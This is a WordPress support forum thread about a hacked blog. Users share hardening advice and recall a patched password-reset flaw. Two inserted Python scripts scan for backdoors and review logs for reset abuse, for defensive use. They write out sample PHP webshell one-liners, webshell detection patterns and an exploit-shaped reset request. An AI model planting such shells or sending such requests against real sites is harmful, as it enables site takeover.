
my site just been hacked…

Viewing 15 replies - 1 through 15 (of 17 total)
  • There are hundreds of ways to avoid hacking a WP site. Here are some of the obvious ones:

    1) Keep WP up to date. Pay attention to the update notices. Same for themes and plugins.
    2) NEVER hack the core. Only use plugins and themes to mod the site.
    3) Use the MINIMUM number of plugins. Make sure that you ABSOLUTELY NEED EVERY SINGLE PLUGIN. Don’t carry “nice to have” plugins.
    4) Use the SIMPLEST theme possible.
    5) Use autogenerated “garbage” passwords (Example: “HG4E*f@s11lo*0f”).
    6) Use different passwords for every site.
    7) This goes for your control panel and FTP access, as well; not just the WP login. In fact, these should be even harder.
    8) Don’t enable SSH on your ISP account unless you absolutely need it. If you do enable it, filter for IP numbers, and use public-key encryption, if possible (SSH keys).
    9) Use common sense. Never give your passwords to any Web site, unless you are 100% sure who they are.
    10) Keep your machine clean. A lot of hacks, these days, are because of malware on webmasters’ machines. Don’t browse for pr0n, and don’t use warez (at least, not on the machine you use for managing Web sites).

    See if you can log into your back end using this – at least you might be able to look around a little:

    //kittyfish.org/wp-admin

    Then follow the steps and advice for cleaning up and securing a hacked blog in these links.

    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

    How to find a backdoor in a hacked WordPress

    I was thinking about renaming the WP_admin folder, then renaming them from the core PHP files..

    My site is //sananddesign.com

    I already tried the wp_admin
    and I found the hacker had already changed my password..

    I requested a new password and got the password response in my email.

    But I didn’t follow it; I was thinking he might be able to phish my email too.

    So I deleted everything and am redesigning the site… 😀

    I was always up to date. I only edited some style code in stylesheet.css from the editor. I think the hacker decrypted the password from my wp_login.php file. Am I correct?

    I was thinking about renaming the WP_admin folder, then renaming them from the core PHP files..

    That is definitely not a solution, and it’s also an introduction to more problems. You need to identify your weaknesses, fix the hack, and then secure your site and server to the best of your ability. That may include examining file and folder permissions, plugin and theme issues, reviewing your access logs, talking to your host, and even checking the computers you use to log in to your ftp or hosting account for possible password harvesting malware.

    There are literally hundreds of conversations on this topic in the forums.

    http://wordpress.org/search/hacked?forums=1

    You can modify and refine that search by using keywords that are relevant to your issue.
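    The reply above points at file and folder permissions and at hunting for a backdoor. As an added example (not code from the thread or from WordPress), here is a small Python scanner for the things a post-compromise review usually turns up: PHP dropped under wp-content/uploads where only media belongs, world-writable paths, and the usual webshell idioms inside PHP files. The sample site tree, the planted backdoor contents and the pattern list are constructed for this example; point scan_site() at a real document root to use it for real.

    ```python
    """Added example: scan a WordPress document root for common backdoor
    indicators and permission problems.  Not code from the forum thread."""
    import os
    import re
    import stat
    import tempfile

    # Idioms that almost never appear in legitimate theme or plugin code but
    # show up in most dropped PHP backdoors.  Assumed list; tune for your site.
    SUSPICIOUS = [
        ("eval of encoded payload",
         re.compile(r"eval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(", re.I)),
        ("preg_replace with /e modifier",
         re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/[a-z]*e[a-z]*['\"]", re.I)),
        ("function name taken from request data",
         re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]*\]\s*\(", re.I)),
        ("command execution",
         re.compile(r"\b(?:shell_exec|passthru|system|proc_open|popen|exec)\s*\(", re.I)),
        ("long base64 blob",
         re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")),
    ]


    def scan_file(path, root):
        """Return the list of indicators found for one file (empty if clean)."""
        rel = os.path.relpath(path, root).replace(os.sep, "/")
        findings = []
        is_php = rel.lower().endswith((".php", ".phtml", ".php5"))
        # WordPress stores media under wp-content/uploads; code there is a red flag.
        if is_php and rel.startswith("wp-content/uploads/"):
            findings.append("php file in uploads")
        if os.stat(path).st_mode & stat.S_IWOTH:
            findings.append("world-writable file")
        if is_php:
            with open(path, "rb") as fh:
                text = fh.read().decode("latin-1")  # never fails on arbitrary bytes
            for label, rx in SUSPICIOUS:
                if rx.search(text):
                    findings.append(label)
        return findings


    def scan_site(root):
        """Walk a WordPress document root; return {relative path: [indicators]}."""
        report = {}
        for dirpath, dirnames, filenames in os.walk(root):
            for name in dirnames:
                full = os.path.join(dirpath, name)
                # A world-writable directory lets any local process, including a
                # script running as the web-server user, drop new files into the site.
                if os.stat(full).st_mode & stat.S_IWOTH:
                    report[os.path.relpath(full, root).replace(os.sep, "/")] = ["world-writable dir"]
            for name in filenames:
                full = os.path.join(dirpath, name)
                found = scan_file(full, root)
                if found:
                    report[os.path.relpath(full, root).replace(os.sep, "/")] = found
        return report


    def build_sample_site():
        """Constructed sample tree: a clean minimal theme plus two planted
        backdoors and one sloppy permission.  Returns the temporary root."""
        root = tempfile.mkdtemp(prefix="wp-sample-")
        files = {
            "index.php": "<?php define('WP_USE_THEMES', true); require './wp-blog-header.php';\n",
            "wp-content/themes/simple/style.css": "/* Theme Name: Simple */\nbody { margin: 0; }\n",
            "wp-content/themes/simple/functions.php": "<?php add_theme_support('post-thumbnails');\n",
            # planted: code hidden among media, executing whatever is POSTed to it
            "wp-content/uploads/2010/04/image.php": "<?php eval(base64_decode($_POST['c']));\n",
            # planted: a one-line command shell appended to a theme file
            "wp-content/themes/simple/footer.php": "</body></html><?php echo shell_exec($_GET['cmd']); ?>\n",
        }
        for rel, body in files.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w") as fh:
                fh.write(body)
        os.chmod(os.path.join(root, "wp-content", "uploads"), 0o777)  # the sloppy permission
        return root


    if __name__ == "__main__":
        for rel, indicators in sorted(scan_site(build_sample_site()).items()):
            print(f"{rel}: {', '.join(indicators)}")
    ```

    On a real site, run it as the account that owns the files, review every hit by hand (the base64 pattern in particular will also catch legitimate embedded images or minified assets), and compare the list of PHP files against a fresh copy of the same WordPress, theme and plugin versions rather than trusting the patterns alone.
    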

    I have an SFTP server for this site. I think the hacker decrypted the password from my wp_login.php file. Am I correct?

    No.

    Yah! I checked it! It’s not there…

    You are not alone. I got an email from a blog today that said:

    Password Lost and Changed for user: admin1

    I have new members shut off, but I open up the site – go to administration – and sure enough – admin1 is registered AND AN ADMIN! What is the deal? In all of my years running websites, I have NEVER seen software pwned like this. My passwords are 30 characters long – generated with a program, with digits, upper and lower case, and odd symbols.

    Did you check your settings/options?

    @bluetiereign

    In all of my years running websites,

    You must then also be aware that there is a HUGE list of variables, besides just the platform you are using, that need to be included in your statement but that you don’t mention.

    What you describe above, however, sounds a little like a well known vulnerability that allowed a remote admin password reset in an older version of WordPress (I think it was around version 2.8.3 or so) that was patched quite some time ago. But that might not be the reason in your case. Just a thought.

    Take a look around the forums for recent issues (last 30 – 60 days) involving NetSol, GoDaddy, etc… There’s some pretty interesting and lengthy discussions involving this very subject.
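    The remote password-reset flaw ClaytonJames recalls was fixed in WordPress 2.8.4; it was triggered by supplying the reset `key` parameter as an array (`key[]=`) on wp-login.php, which bypassed the empty-key check. Whether or not that is what hit the blog above, the access log is where the answer lives. As an added example (not code from the thread), here is a Python review of combined-format access logs that flags reset requests with array-style or empty keys and clients that hammer the lost-password form. The log lines are constructed for the example; the threshold is an assumption.

    ```python
    """Added example: review web-server access logs for password-reset abuse on
    wp-login.php.  Not code from the forum thread or from WordPress."""
    import re
    from collections import defaultdict
    from urllib.parse import parse_qs, urlsplit

    # Apache/nginx "combined" format: client, identity, user, [time], "request", status, ...
    LOG_RE = re.compile(
        r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
        r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
    )

    # Constructed sample: ordinary visitors, a legitimate reset link, one client
    # using the array-key shape, and one client flooding the lost-password form.
    SAMPLE_LOG = """\
    203.0.113.7 - - [12/Apr/2010:10:01:02 +0000] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
    203.0.113.7 - - [12/Apr/2010:10:01:05 +0000] "GET /2010/04/hello-world/ HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
    198.51.100.23 - - [12/Apr/2010:10:02:10 +0000] "GET /wp-login.php?action=lostpassword HTTP/1.1" 200 1810 "-" "curl/7.19.7"
    198.51.100.23 - - [12/Apr/2010:10:02:11 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302 0 "-" "curl/7.19.7"
    198.51.100.23 - - [12/Apr/2010:10:02:12 +0000] "GET /wp-login.php?action=rp&key[]=&login=admin1 HTTP/1.1" 200 1580 "-" "curl/7.19.7"
    192.0.2.44 - - [12/Apr/2010:11:15:00 +0000] "GET /wp-login.php?action=rp&key=7H2j9kLm3pQr5sTv&login=editor HTTP/1.1" 200 1580 "-" "Mozilla/5.0"
    198.51.100.99 - - [12/Apr/2010:10:30:01 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 200 1810 "-" "python-urllib/2.6"
    198.51.100.99 - - [12/Apr/2010:10:30:02 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 200 1810 "-" "python-urllib/2.6"
    198.51.100.99 - - [12/Apr/2010:10:30:03 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 200 1810 "-" "python-urllib/2.6"
    198.51.100.99 - - [12/Apr/2010:10:30:04 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 200 1810 "-" "python-urllib/2.6"
    """


    def parse_line(line):
        """Split one combined-format log line into its useful parts (None if unparsable)."""
        m = LOG_RE.match(line)
        if not m:
            return None
        url = urlsplit(m.group("target"))
        return {
            "ip": m.group("ip"),
            "ts": m.group("ts"),
            "method": m.group("method"),
            "path": url.path,
            "query": parse_qs(url.query, keep_blank_values=True),
            "status": int(m.group("status")),
        }


    def review_resets(log_text, lostpassword_threshold=3):
        """Return {client ip: [reasons]} for clients whose wp-login.php traffic
        looks like reset abuse rather than a user who forgot a password."""
        findings = defaultdict(list)
        lostpassword_posts = defaultdict(int)
        for line in log_text.splitlines():
            rec = parse_line(line)
            if rec is None or rec["path"] != "/wp-login.php":
                continue
            ip, query = rec["ip"], rec["query"]
            action = query.get("action", [""])[0]
            if action == "lostpassword" and rec["method"] == "POST":
                lostpassword_posts[ip] += 1
            elif action == "rp":
                # Genuine reset links carry key=<random string>.  WordPress never
                # emits an array-style key (key[]=) or an empty key itself.
                login = query.get("login", ["?"])[0]
                if any(name.startswith("key[") for name in query):
                    findings[ip].append(f"{rec['ts']}: reset key sent as an array (key[]=) for login={login}")
                elif not query.get("key", [""])[0]:
                    findings[ip].append(f"{rec['ts']}: reset request with an empty key for login={login}")
        for ip, count in lostpassword_posts.items():
            if count >= lostpassword_threshold:
                findings[ip].append(f"{count} lost-password submissions (enumeration or reset flooding)")
        return dict(findings)


    if __name__ == "__main__":
        for ip, reasons in review_resets(SAMPLE_LOG).items():
            print(ip)
            for reason in reasons:
                print("  " + reason)
    ```

    Cross-check every flagged client against the "Password Lost and Changed" emails and the user-registration timestamps in wp_users; a reset that succeeded from an address that never otherwise logged in is the kind of thing worth taking to the host with the exact log lines attached.
    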

    I’m not sure what or who you are asking about settings… but of course I checked the settings. I also only had two plugins – both now removed – and one of them should have been an option anyway with WordPress – Members Only.

    I put in the user’s email address and came up with this:

    Google Searched

    @ClaytonJames

    I’m using 2.9.2. Thanks for the links. I will check.

    I’m not seeing any recent issues with JustHost. This is disturbing, to say the least. I am not losing anything by it being hacked as I don’t really have a working blog going on.. but good grief – lol. Anyway, I will keep my eyes peeled to see if this starts being an issue…
